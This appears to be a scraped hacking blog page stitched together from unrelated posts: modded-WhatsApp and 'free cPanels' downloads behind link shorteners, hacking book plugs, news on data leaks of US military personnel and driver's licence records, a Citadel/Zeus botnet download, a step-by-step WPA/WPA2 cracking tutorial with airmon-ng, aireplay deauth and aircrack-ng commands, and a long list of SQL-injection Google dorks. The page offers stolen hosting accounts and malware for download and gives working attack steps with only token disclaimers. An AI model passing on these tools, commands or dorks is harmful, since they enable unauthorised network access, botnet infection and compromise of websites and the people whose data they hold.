Whatsapp: Use 20+ whatsapp in one device

Hello guys , we all know a couple of number is common these days so don’t you think you need all over whatsapp and live in one single device. Guess what yes its possible to do so we can start up all whatsapp. so lets get started.

Its pretty simple guys just follow these simple steps and yeah all link in end of post
  1. Download the whatsapp from below give link.
  2. Install it on your device
  3. After completion verify with which ever number you wish to start whatspp
  4. okay done. If you need all 20 follow same steps for each of them.


http://adf.ly/1bfFZz

Hacking : The Art Of Exploitation


The person who already reads this book i really respect you Because this book 
is Full of Hacking Exploits
Must Buy And Read This Book


Blackhat Hacking Pocket Guide






Looking For Some More Cool Hacking Guide Book ?
Here Buy This Book To Learn More :] Maybe You Guys Thinking Why I'm Saying To You Guys
To Buy These Books ? Well
Knowledge is power , To Become A Smart Person Then Read Books :)




Professional Penetration Testing


This Book is so freaking Cool and Amazing i learn alot from this book too
I highly Recommend You Guys To Purchase This Book

Hacking Beginners


Everyone when comes to hacking world he/she got to many questions in his mind 
like " What should i do ? "
You guys don't need to watch any kind of Tutorials
I Recommend you guys this Book
I bought this book years before and i found this book very helpful its very Cheap price book 
so Don't wait anymore just buy it and Rock n Roll :]

Ghost Squad Hackers Leak Data of US Military Personnel

Ghost Squad Hackers Leak Data of US Military Personnel
All three data dumps amount to 3,415 records
Ghost Squad Hackers dumped the data of US military personnel, according to a Facebook post published today.
The data is on a website on the Dark Web but was added to PasteBin after a few hours as well.
Group leaks data for around 3,400 servicemen
Dump #1 contains 433 records. For each record, with very few exceptions, there's data included such as a person's name, phone number, address lines, city, state, ZIP code, country (all US), email address, age, gender, and income level.
Dump #2 contains 232 records. For each record, there's an email address, first name, last name, address, city, state, ZIP code and phone number.
Dump #3 contains 2,750 records. For each record, the data dump may include a full name, email address, date of birth, address lines, credit card number, credit card expiration date, credit card CVV, credit card type, and two fields marked APO and AE. APO may stand for Automatic Payment Order.
Group says leak is part of ‪#‎OpSilence‬
"The final release for #OpSilence Army database leaked, your empire ran by banks will fall US GOV," the group wrote on Facebook. "You must view these leaks in Tor Browser we are not jeopardizing our freedom."
OpSilence is a hacktivist campaign launched by Ghost Squad Hackers at the start of June. When announced, the group told Softpedia that OpSilence was a campaign against mainstream media sites because they failed to report the true crimes happening in Palestine and Syria.
Previously, Ghost Squad Hackers had also been at the core of OpIcarus, a campaign of DDoS attacks against banks in several countries.
The hackers are associated with the Anonymous movement but have recently started to promote their own name via OpSilence.
Group Squad Hackers loses its leader
One of the most infamous such incidents occurred last summer, when the US killed Junaid Hussein in a drone strike. Hussein was the former leader of the TeaMp0isoN hacking crew, but at the time of his death, he joined the Islamic State's Hacking Division called the Cyber Caliphate.
Maybe this is the reason why, approximately one hour before Ghost Squad Hackers leaked the data, its official leader, a hacker known as Gh0s7, announced on Twitter he was leaving the group.

Free Cpanels



Hello Guys , I got to many email from many peoples Saying to me Please Provide us Cpanels
So its your lucky day guys cuz im not feeling lazy today :]

The List Im Gonna Provide , Don't Use It For Any Bad Purpose


http://reliablefiles.com/file/0585wh


Hit The Download Button & Complete a short survey and get free Cpanels
For Any Kind Of Help Contact Us :-


Citadel Botnet


NOTE :- 

                 Every Ethical Tech We Teach You Here Is Only For Education Purpose

                 For Your Any Damage We Are Not Responsible :]

                 So Please Don't Do Anything Bad !

-----------------------------------------------


What Is Botnet ?

A network of private computers infected with malicious software and controlled as a group without the owners' knowledge, e.g. to send spam.



Citadel Bot ( Zeus Bot ) is most common and most dangerous Bot in these days , Many Spammers And Hackers use It for to Hack Personal Information , Bank Accounts etc

Use It At Your Own Risk
---------------------------

http://filerack.net/file/0585wD
 

The File Is Protected By ShareCash , So Please Complete The Survey and downlaod the file.
 


Cracking WPA/WPA2 – PSK Encryption


About a month ago, to my embarrassment, I learned that my Wi-Fi password was so weak that even my 10 year old neighbour could crack it…
No, not really.

  • A little Disclaimer – The contents of this post are solely for ethical and educational purposes. You may not use it for unethical purposes. The Author or the Website is not responsible for any damage to yourself, your network, or the computers in you network, should something go wrong. (Basically guys, be careful where you use this and please don’t do anything stupid.)

    We’re going to start with a little introduction to Kali Linux, because that is the OS I prefer, is the easiest for this task and comes with all the tools we need. “Kali” is a Linux distribution and is the successor to the much acclaimed Backtrack, which many of you reading this article will probably know of. Now, there are many ways of installing and using Kali, if anyone needs any help, leave in the comments, and I will probably write another post about installing and its basics in the future.
    In this tutorial, I’m going to hack into a Wi-Fi hotspot that I just set up, named – Anonymus.
    Now, given that we have Kail Linux, open up a terminal window, type in “ifconfig “. This is going to list all the networking interfaces connected to your device.
    Here, we only need (wlan0) which is our Wi-Fi card, so we can disable the others by doing “ifconfig <name of the interface> down”.
    (“lo” does no matter)…


Now, we type “airmon-ng start wlan0”



(airmon-ng is just a tool for monitoring air traffic, “start” basically starts the tool, and “wlan0” specifies the interface we are using for monitoring)
It’ll probably show “some processes that could cause trouble”, we’ll simply kill those processes by entering “kill <process ID>”.

Now if we do “ifconfig”, it should show us the newly made monitoring interface “mon0”.

 Then, put in, “airodump-ng mon0”.
In the screenshot below, the highlighted bssid is our target (and it is my own), named “Anonymus”, the channel is 13 as we can see under the “CH” column.


 For our next step we type in, “airodump-ng –c <channel> -w <name> –bssid <bssid> mon0”.
Let me explain a few things here, “airodump-ng” is a tool for capturing Wi-Fi packets, “<channel>” means the channel your target is running on, “-w” basically writes a file by the name that succeeds it in “<name>”, (I did “handshake” just for the convenience of it) bssid is a string of numbers specific to a hotspot.




Now, open up a new terminal and type in “aireply-ng -0 0 –a <bssid> mon0”, this command send a deauthentication signal (usually called a deauth packet) to all the devices connected to that hotspot. Then after a few seconds we stop it by “Ctrl+C”. Now, as we can see, the other terminal shows that the WPA Handshake was successfully captured.

We can close both windows at this point, and open a new one. Type “ls”; that should list the files in the current directory. We can clearly see that the files from the above operation are present. But we only need the file ending with “-01.cap”.


 Then we do, “aircrack-ng –w <full location of the wordlist> <the file name>”.
 

 You may be asking what wordlist? What is that sh*t?
A Wordlist is a file containing thousands of known and possible passwords, which you can download from the internet (“specifying from the internet” – We ain’t dumb, boy! :P). The one I used can be found here. The list contains 982,963,904 words exactly all optimized for WPA/WPA2. Would also just like to point out that this is not my work, I got it from forums.hak5.org. It was a guy who compiled a whole load of useful lists, including his own to come up with 2 lists (one is 11gb and one is 2gb) I will be seeding this torrent indefinitely since it is shareware and awesome!

It will then start searching for matching keys in the word list. Now the time that this will take is solely dependent on the strength of the password. The stronger the password the more time will it take. For very strong passwords, check this out. For tips on creating your own strong password – Top 10 Tips to Create a Strong Password
After completion it looks something like the screenshot below. In it, you can see that it tested 45688 keys and my key was the 45689th. I purposely put futurama because frankly, futurama is awesome! Also it is a very weak password (People reading this, if your password is “futurama”, you’re cool! The Hell? Change it right now!)





Now that we know the password, lets test it…

Annnnd… Voila! it works!
Knowing this you will be…
But beware, don’t use it on a Lannister… (Because a Lannister always pays his debts :P)
For those of you who didn’t understand that reference, xD






 

Over 290,000 US Driver’s License Records Has Been Put Up On Sale In The Dark Web

Using the name of NSA, a hacker has put up for sale on the Dark Websome data that contains the personal details and driver’s license information of over 290,000 US citizens which he had stolen after breaching the networks of several Louisiana organizations. The hacker has uploaded these data in The Real Deal, a underground marketplace. NSA says he extracted the driver’s license details from the stolen databases that contained information on driving violations. Also he claims the databases also held information about more serious crimes like murders.
Lot of personal information has been stolen and accessed which includes driving offense, fine total, first name, middle name, last name, date of birth, driver’s license number, state in which the driver’s license was issued, address, city, state, ZIP code, phone number, and email address. The hacker added that the most common dates of birth are from 1983, but the data also includes information on teenagers and senior citizens.
“Disregard the price on this listing. Make me an offer that you and I can both agree to and I’ll create a private listing that you can use to purchase this database”, the beginning of the hackers ad states. It is noted the ‘NSA’ hacker has no history of selling on The Real Deal – and without the reputation or positive feedback from the users there the hacker may find it difficult to shift the data dump.


SQL Dorks Updated List

What Is Dorks ?

Dorks are an input query into a search engine (Google) which attempt to find websites with the given text provided in the dork itself. Basically it helps you to find websites with a specific code in their url which you know is a sign of vulnerability.
A more specific definition could be “Advanced Google searches used to find security loopholes on websites and allow hackers to break in to or disrupt the site.” 

Here Is The List Of Common & Updated Dorks List :

index.php?id=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=

Note: E-Techs is not responsible for any damage or data loss caused using this tutorial, we publish tutorials only for educational purpose.